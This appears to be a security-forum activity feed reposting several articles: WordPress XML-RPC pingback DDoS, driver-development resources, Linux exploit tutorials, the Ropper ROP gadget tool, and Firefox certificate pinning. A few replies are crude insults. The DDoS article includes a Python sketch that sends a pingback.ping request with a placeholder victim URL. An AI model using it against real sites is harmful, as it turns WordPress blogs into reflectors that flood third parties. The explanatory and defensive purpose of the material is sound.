WordPress has a feature that can send requests to another WordPress site. This function has been abused for several years, and just a few months ago a DDoS attack was mounted again using the XML-RPC feature to amplify pingbacks against an unsuspecting target.

WordPress Prevalence
WordPress is everywhere. About 22% of all sites on the Internet are WordPress sites, according to Akamai's State of the Internet Q1 2014 Report. It powers sites small to large.

What is it? WordPress and XML-RPC
WordPress is a Content Management System for blogging that uses a plugin architecture and templates. XML-RPC is a specification describing how an HTTP POST request with XML as the encoding allows software running on different operating systems and in different environments to make procedure calls over the Internet. XML-RPC support has existed in WordPress for years and has been enabled by default since version 3.5. An administrator can manage almost any aspect of the WordPress installation from any application that implements XML-RPC, such as a mobile app. Users, posts, pages or tags can be created, modified and deleted by administrators.

How is it used? For Good.
According to the specification, a minimal request is all that is needed to receive a list of the methods WordPress supports (a system.listMethods call; the original post showed it as an image, and a reconstruction is sketched after this post). A list of the methods in the XML-RPC WordPress API can be found here: XML-RPC WordPress API « WordPress Codex

The Attack. What Is Pingback And How Does It Work?
One such method is pingback.ping, a feature that links a post on one site to a post on another site. Another way to put it: SiteA is notified that SiteB has linked back to it. The advantage of this is that SiteA increases its credibility by most search engines' standards and SiteB cites authorship.

How Can It Be Abused? DDoS Attack?
Even though this "bug" was documented in 2007 (https://core.trac.wordpress.org/ticket/4137) and WordPress has attempted to reduce the vulnerability to the attack, in March 2014 more than 160,000 WordPress sites were used in this amplification technique to perform a DDoS attack against a single site. All that was necessary was the source and target URI.

The Taxonomy Of The Attack
To craft the attack, simply POST a pingback.ping request like the one sketched after this post. With this call, the target receives a GET request for the (non-existent) source page, forcing a full page load and taking away resources needed by legitimate users. If many WordPress sites all point to the same site, the target will experience a DDoS. The source can be any URL.

Defend Yourselves
A WordPress site owner can defend against being used as a pivot point in launching a DDoS by upgrading to the latest WordPress, either from the Dashboard or by downloading it here: https://wordpress.org/latest.zip

About HP Fortify on Demand
HP Fortify on Demand is a cloud-based application security testing solution. We perform multiple types of manual and automated application security testing, including web assessments, mobile application security assessments, thick client testing, ERP testing, etc. We do it both statically and dynamically, both in the cloud and on premise.

Sursa: Security issues in WordPress XML-RPC DDoS Explaine... - HP Enterprise Business Community
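The two requests the post above refers to (the minimal method-listing call and the pingback.ping call) were shown as images in the original article and did not survive this repost. The sketch below is a hedged reconstruction: the /xmlrpc.php endpoint and the method names are standard WordPress, the host names are placeholders, and it should only ever be pointed at a blog you own.

import urllib.request

# Body of a minimal system.listMethods call, which enumerates the XML-RPC
# methods a WordPress install exposes.
LIST_METHODS = """<?xml version="1.0"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params/>
</methodCall>"""

# Shape of the abused pingback.ping call. The first parameter is the
# "source" URL: the blog receiving this request issues a GET to it in
# order to verify the link, which is exactly the reflection the article
# describes when the source is set to a victim's URL.
PINGBACK = """<?xml version="1.0"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://victim.example/?p=1234</string></value></param>
    <param><value><string>http://reflector.example/2014/09/some-post/</string></value></param>
  </params>
</methodCall>"""

def post_xmlrpc(endpoint, body):
    """POST an XML-RPC payload and return the raw response text."""
    req = urllib.request.Request(
        endpoint,
        data=body.encode("utf-8"),
        headers={"Content-Type": "text/xml"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")

# Example, against your own test blog only:
# print(post_xmlrpc("http://my-test-blog.example/xmlrpc.php", LIST_METHODS))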
-
I've changed the forum's organization a bit to highlight the tutorials. I think it's quite visible. Maybe this way they'll catch your attention more.
-
Pizdelor.
-
Starting today, the storage of personal data is no longer permitted
Nytro replied to dicksi's topic in Stiri securitate
Muie garda. -
-
Device Driver Development for Beginners - Reloaded
by Evilcry » Mon Oct 04, 2010 8:14 am

Hi,

This is just a little starter for people interested in getting into Kernel-Mode Development. Following a good thread on the UIC forum, opened by a beginner who wanted to know how to start with Device Driver Development, I remembered that a long time ago I published a similar blog post on that subject. Now I'm going to reload and expand it.

Development Tools

1. WDK/DDK - this is the proper Driver Development SDK from Microsoft; the latest edition can be downloaded at How to Get the WDK
2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the comforts given by such an advanced IDE, especially in the presence of complex device drivers.
3. DDKWizard - DDKWizard is a so-called project creation wizard (for Visual Studio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to its creation. You can download it at Welcome to the DDKWizard homepage
4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can try/buy it at Visual Assist - a Visual Studio extension by Whole Tomato Software
5. VisualDDK - Develop and debug drivers directly from VS; enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and step-by-step quick start guide: VisualDDK - Quickstart
6. Virtual Machine - You need a virtual machine to perform efficient driver debugging; the best options are VMWare or VirtualBox.

Building a Driver Development Environment

As you can see, a good, comfortable driver development station is composed of a fair number of components, so we need an installation order:

1. Install your IDE - VisualStudio2008 or VisualStudio2010
2. Install the WDK package
3. Install DDKWizard
4. Download and place (usually into C:\WinDDK) ddkbuild.cmd
5. By following the DDKWizard PDF you will be guided to add a new Environment Variable directly related to the OS version on which you are developing, and then add a reference to ddkbuild.cmd in the VS IDE. The DDKWizard manual is very well written.
6. After finishing the DDKWizard integration you can test whether your environment is correctly installed by compiling your first driver. The steps are easy: open VS and select the DDKWizard template (not EmptyDriver) and you will see the skeleton of a driver. All you have to do is Build Solution and verify that no compiling errors occur; if so, your station is correctly installed.
7. Install the virtual machine
8. Integrate the debugging help of VisualDDK by following its step-by-step quick start guide
9. Install Visual Assist (this can be done at any moment after the VS installation)

Additional Tools

* DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and (b) a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it at Downloads:DeviceTree
* IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed.
In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of the static portion of the IRP and an interpreted view of the current and previous stack locations. Download it at Downloads:IrpTracker
* DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it at Downloads:DebugMon
* DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must-have for your tool chest. x86 architecture. Download it at Downloads:Driver Loader

Now you have a fully working develop-and-debug station. As you should imagine, driver development means working in Kernel Mode - a pretty challenging, delicate and complex task. A badly written driver leads to OS crashes and/or dangerous bugs; just think about a driver used in mission-critical applications like surgery, where a bug or a crash could have extremely serious consequences.

The driver needs to be:

* Bug Free
* Fault Tolerant
* Ready to Endure all Stress Situations

This can be achieved only by a driver coder with a solid knowledge of the following fields:

* Hardware Architecture
* Operating System Architecture
* Kernel and User Mode Architecture
* Rock Solid C language knowledge
* Debugging Ability

Here I'm going to enumerate the documentation, books, etc. necessary to achieve a *good and solid* background and advanced knowledge of driver coding.

Microsoft WDK Page: Windows 8.1: Download kits and tools

It will give you information about:

1. WDM (Windows Driver Model)
2. WDF (Windows Driver Foundation)
3. IFS Kit (Installable FileSystem Kit)
4. Driver Debugging
5. Driver Stress Testing (DriverVerifier tool)

PC Fundamentals: Windows Hardware Design Articles (Windows Drivers)
Device Fundamentals: Windows Hardware Design Articles (Windows Drivers)

This will give you a broad view of what developing a driver means, which components are touched and which aspects you need to know. It's also obviously necessary to have a reference for the kernel-mode functions and mechanisms involved; the best resource is always MSDN. Here is the starter link to follow, MSDN->DDK: http://msdn.microsoft.com/en-us/library ... 85%29.aspx
How to start Learning

As pointed out in the previous blog post, one of the best starting points, which will give you a quick overview of development topics, is the Toby Opferman set of articles:

Driver Development Part 1: Introduction to Drivers
Driver Development Part 1: Introduction to Drivers - CodeProject
Driver Development Part 2: Introduction to Implementing IOCTLs
Driver Development Part 2: Introduction to Implementing IOCTLs - CodeProject
Driver Development Part 3: Introduction to driver contexts
Driver Development Part 3: Introduction to driver contexts - CodeProject
Driver Development Part 4: Introduction to device stacks
Driver Development Part 4: Introduction to device stacks - CodeProject
Driver Development Part 5: Introduction to the Transport Device Interface
Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject
Driver Development Part 6: Introduction to Display Drivers
Driver Development Part 6: Introduction to Display Drivers - CodeProject

It's really important to highlight Memory Management in Kernel Mode; the best starting points for these aspects are the tutorials written by four-f: http://www.freewebs.com/four-f/

Handling IRPs: What Every Driver Writer Needs to Know
http://download.microsoft.com/download/ ... a/IRPs.doc

Book Resources

Tutorials are a great starting point, but a solid understanding comes from a set of more in-depth texts, hence the need for a good book collection:

Windows NT Device Driver Development (OSR Classic Reprints)
http://www.amazon.com/Windows-Device-De ... 242&sr=8-2
Windows®-Internals-Including-Windows-PRO-Developer
http://www.amazon.com/Windows%C2%AE-Int ... 160&sr=8-1
The Windows 2000 device driver book: a guide for programmers
http://www.amazon.com/Windows-2000-Devi ... 0130204315
Windows NT/2000 Native API Reference
http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1
Undocumented Windows 2000 Secrets
Undocumented Windows 2000 Secrets
Developing Drivers with WDF
Developing Drivers with the Windows Driver Foundation: Reference Book (Windows Drivers)
Windows NT File System Internals, A Developer's Guide
Windows NT File System Internals - O'Reilly Media

Web Resources

The first and most important resource about Windows Driver Development is OSR Online: OSR Online - The Home Page for Windows Driver Developers

I strongly suggest you subscribe to:

1. The NT Insider
2. NTDEV MailingList
3. NTFSD MailingList

NDIS Developer's Reference
NDIS Developer's Reference Information, Articles, and Free Downloads Resources
The Undocumented Functions
NTAPI Undocumented Functions
MSDN Blog
driver writing != bus driving - Site Home - MSDN Blogs
Windows Vista Kernel Structures
Windows Vista Kernel Structures
Peter Wieland's thoughts on Windows driver development
Pointless Blathering - Site Home - MSDN Blogs
USB Driver Development
Microsoft Windows USB Core Team Blog - Site Home - MSDN Blogs
Hardware and Driver Developer Blogs
Support and community for Windows hardware developers
Developer Newsgroups
• microsoft.public.development.device.drivers
• microsoft.public.win32.programmer.kernel
• microsoft.public.windbg
KernelmodeInfo Blog
CURRENT_IRQL
j00ru//vx tech blog - Coding, reverse engineering, OS internals
j00ru//vx tech blog
Nynaeve
Nynaeve
DumpAnalysis Blog
Software Diagnostics Institute | Structural and Behavioral Patterns for Software Diagnostics, Forensics and Prognostics. Software Diagnostics Library.
Analyze -v Blog
http://analyze-v.com/
Instant Online Crash Dump Analysis
Instant Online Crash Analysis
Winsock Kernel (WSK)
Winsock Kernel (Windows Drivers)
Transport Driver Interface (TDI) / Network Driver Interface Specification (NDIS)
The NDIS blog - Site Home - MSDN Blogs
System Internals
System Internals (Windows Drivers)

Driver development takes a great deal of time, patience and experience to fully understand. In my opinion the best approach remains LbD (Learning by Doing), so read, study and develop: the more experience you build, the fewer BSODs and "strange behaviors" you will get.

See you in the next post,
Giuseppe 'Evilcry' Bonfa

Sursa: KernelMode.info • View topic - Device Driver Development for Beginners - Reloaded
-
Packet Storm Security Linux Exploit Writing

Linux Exploit Writing Tutorial Part 1
Quote: "This whitepaper is the Linux Exploit Writing Tutorial Part 1 - Stack Overflows."

Linux Exploit Writing Tutorial Part 2
Quote: "This whitepaper is the Linux Exploit Writing Tutorial Part 2 - Stack Overflow ASLR bypass using ret2reg instruction from vulnerable_1."

Linux Exploit Writing Tutorial Part 3
Quote: "This whitepaper is the Linux Exploit Writing Tutorial Part 3 - ret2libc."

Linux Exploit Development Part 2 Rev 2
Linux Exploit Writing Tutorial Part 3 Rev 2

Links:
Linux Exploit Writing Tutorial Part 1 ≈ Packet Storm
Linux Exploit Writing Tutorial Part 2 ≈ Packet Storm
Linux Exploit Development Part 2 Rev 2 ≈ Packet Storm
Linux Exploit Writing Tutorial Part 3 ≈ Packet Storm
Linux Exploit Writing Tutorial Part 3 Revision 2 ≈ Packet Storm

Sursa: EXETOOLS FORUM
-
We're not Apple hipsters. Well, only @aelius is.
-
Latest Firefox version adds protection against rogue SSL certificates
Nytro replied to Nytro's topic in Stiri securitate
It's good, man. SSL pinning = a hardcoded RootCA/server certificate. That means it prevents Man-in-the-Middle attacks even with a RootCA installed locally (on the phone or computer). -
Ropper – rop gadget finder and binary information tool

With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures. For disassembly ropper uses the awesome Capstone Framework. Ropper was inspired by ROPgadget, but should be more than a gadgets finder. So it is possible to show information about a binary like header, segments, sections etc. Furthermore it is possible to edit the binaries and edit the header fields. Until now you can set the aslr and nx flags.

usage: ropper.py [-h] [-v] [--console] [-f <file>] [-i] [-e] [--imagebase]
                 [-c] [-s] [-S] [--imports] [--symbols] [--set <option>]
                 [--unset <option>] [-I <imagebase>] [-p] [-j <reg>]
                 [--depth <n bytes>] [--search <regex>] [--filter <regex>]
                 [--opcode <opcode>] [--type <type>]

With ropper you can show information about files in different file formats and you can search for gadgets to build rop chains for different architectures.

supported filetypes:
  ELF
  PE

supported architectures:
  x86
  x86_64
  MIPS

optional arguments:
  -h, --help                Show this help message and exit
  -v, --version             Print version
  --console                 Starts interactive commandline
  -f <file>, --file <file>  The file to load
  -i, --info                Shows file header [ELF/PE]
  -e                        Shows EntryPoint
  --imagebase               Shows ImageBase [ELF/PE]
  -c, --dllcharacteristics  Shows DllCharacteristics [PE]
  -s, --sections            Shows file sections [ELF/PE]
  -S, --segments            Shows file segments [ELF]
  --imports                 Shows imports [ELF/PE]
  --symbols                 Shows symbols [ELF]
  --set <option>            Sets options. Available options: aslr nx
  --unset <option>          Unsets options. Available options: aslr nx
  -I <imagebase>            Uses this imagebase for gadgets
  -p, --ppr                 Searches for 'pop reg; pop reg; ret' instructions [only x86/x86_64]
  -j <reg>, --jmp <reg>     Searches for 'jmp reg' instructions (-j reg[,reg...]) [only x86/x86_64]
  --depth <n bytes>         Specifies the depth of search (default: 10)
  --search <regex>          Searches for gadgets
  --filter <regex>          Filters gadgets
  --opcode <opcode>         Searches for opcodes
  --type <type>             Sets the type of gadgets [rop, jop, all] (default: all)

example uses:

[Generic]
ropper.py
ropper.py --file /bin/ls --console

[Informations]
ropper.py --file /bin/ls --info
ropper.py --file /bin/ls --imports
ropper.py --file /bin/ls --sections
ropper.py --file /bin/ls --segments
ropper.py --file /bin/ls --set nx
ropper.py --file /bin/ls --unset nx

[Gadgets]
ropper.py --file /bin/ls --depth 5
ropper.py --file /bin/ls --search "sub eax"
ropper.py --file /bin/ls --filter "sub eax"
ropper.py --file /bin/ls --opcode ffe4
ropper.py --file /bin/ls --type jop
ropper.py --file /bin/ls --ppr
ropper.py --file /bin/ls --jmp esp,eax
ropper.py --file /bin/ls --type jop

Download
https://github.com/sashs/Ropper (v1.0.1, 01.09.2014)

Sursa: Ropper - rop gadget finder and binary information tool
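If you would rather drive Ropper from a script than from the interactive console, a thin wrapper over the command line shown above is enough. This is a quick editor's sketch, not part of the Ropper project; it assumes ropper.py is on your PATH and that the target binary exists.

import subprocess

def find_gadgets(binary, pattern, depth=10):
    """Run ropper's --search over a binary and return the output lines."""
    cmd = ["ropper.py", "--file", binary, "--depth", str(depth), "--search", pattern]
    result = subprocess.run(cmd, capture_output=True, text=True, check=False)
    return result.stdout.splitlines()

if __name__ == "__main__":
    # Same style of query as the "example uses" above.
    for line in find_gadgets("/bin/ls", "sub eax"):
        print(line)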
-
The Chinese Underground In 2013
2:04 am (UTC-7) | by Lion Gu (Senior Threat Researcher)

The Chinese underground has continued to grow since we last looked at it. It is still highly profitable, the cost of connectivity and hardware continues to fall, and there are more and more users with poor security precautions in place. In short, it is a good time to be a cybercriminal in China. So long as there is money to be made, more people may be tempted to become online crooks themselves.

How can we measure the growth of the Chinese underground economy? We can look at the volume of their communications traffic. Many Chinese cybercriminals talk via groups on the popular Chinese instant messaging application QQ. We have been keeping an eye on these groups since March 2012. By the end of 2013, we had obtained 1.4 million publicly available messages from these groups. The data we gathered helped us determine certain characteristics and developing trends in the Chinese underground economy.

First, the number of messages showed that the amount of underground activity in China doubled in the last 10 months of 2013 compared with the same period in 2012. Based on the IDs of the senders, we believe that the number of participants has also doubled in the same period.

Cybercriminals are also going where the users are. Many of the malicious goods being sold in the underground economy are targeted at mobile users, as opposed to PC users. A mobile underground economy is emerging in China (something we noted earlier this year), and this part of the underground economy appears to be more attractive and lucrative than other portions.

Our latest paper in the Cybercrime Underground Economy Series, titled The Chinese Underground In 2013, contains the details of these findings related to QQ, as well as other updates dealing with the Chinese underground.

Sursa: The Chinese Underground In 2013 | Security Intelligence Blog | Trend Micro
-
Latest Firefox version adds protection against rogue SSL certificates
Firefox 32 has implemented a feature known as certificate key pinning
By Jeremy Kirk | IDG News Service

Mozilla has added a defense in its latest version of Firefox that would help prevent hackers from intercepting data intended for major online services. The feature, known as certificate key pinning, allows online services to specify which SSL/TLS (Secure Sockets Layer/Transport Layer Security) certificates are valid for their services. The certificates are used to verify a site is legitimate and to encrypt data traffic.

The idea is to prevent attacks such as the one that affected Google in 2011, targeting Gmail users. A Dutch certificate authority (CA), Diginotar, was either tricked or hacked and issued a valid SSL certificate that would work for a Google domain. In theory, that allowed the hackers to set up a fake website that looked like Gmail and didn't trigger a browser warning of an invalid SSL certificate. Security experts have long warned that attacks targeting certificate authorities are a threat. Certificate pinning would have halted that kind of attack, as Firefox would have known Diginotar shouldn't have issued a certificate for Google.

In Firefox 32, "if any certificate in the verified certificate chain corresponds to one of the known good (pinned) certificates, Firefox displays the lock icon as normal," wrote Sid Stamm, senior manager of security and privacy engineering at Mozilla, on a company blog. "When the root cert for a pinned site does not match one of the known good CAs, Firefox will reject the connection with a pinning error," he continued.

The "pins" for the certificates of online services have to be encoded into Firefox. Firefox 32, released this week, supports Mozilla sites and Twitter. Later Firefox releases will support certificate pinning for Google sites, Tor, Dropbox and others, according to a project wiki.

Sursa: Latest Firefox version adds protection against rogue SSL certificates | Applications - InfoWorld
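Firefox's pin list is compiled into the browser, but the underlying check (compare what the server actually presents against a known-good value instead of trusting every installed root CA) can be sketched in a few lines of Python. This is a minimal illustration, not Firefox's implementation; the host name and the pinned fingerprint below are placeholder assumptions, and real-world pinning usually pins a hash of the SubjectPublicKeyInfo of a CA or intermediate in the chain rather than the leaf certificate, so that routine leaf rotation does not break the pin.

import hashlib
import socket
import ssl

# Placeholder values: in a real deployment the pin would be the SHA-256
# fingerprint of the site's known-good certificate (or, better, of the
# SubjectPublicKeyInfo of a CA in its chain).
PINNED_HOST = "www.example.org"
PINNED_SHA256 = "0000000000000000000000000000000000000000000000000000000000000000"

def remote_cert_fingerprint(host, port=443):
    """Fetch the server's leaf certificate and return its SHA-256 fingerprint."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der_cert = tls.getpeercert(binary_form=True)  # DER-encoded bytes
    return hashlib.sha256(der_cert).hexdigest()

if __name__ == "__main__":
    fingerprint = remote_cert_fingerprint(PINNED_HOST)
    if fingerprint != PINNED_SHA256:
        # The chain may still validate against the local CA store (as it would
        # have with the rogue Diginotar certificate), but it is not the
        # certificate we pinned, so the connection is refused.
        raise SystemExit("Pinning error: unexpected certificate " + fingerprint)
    print("Certificate matches the pin")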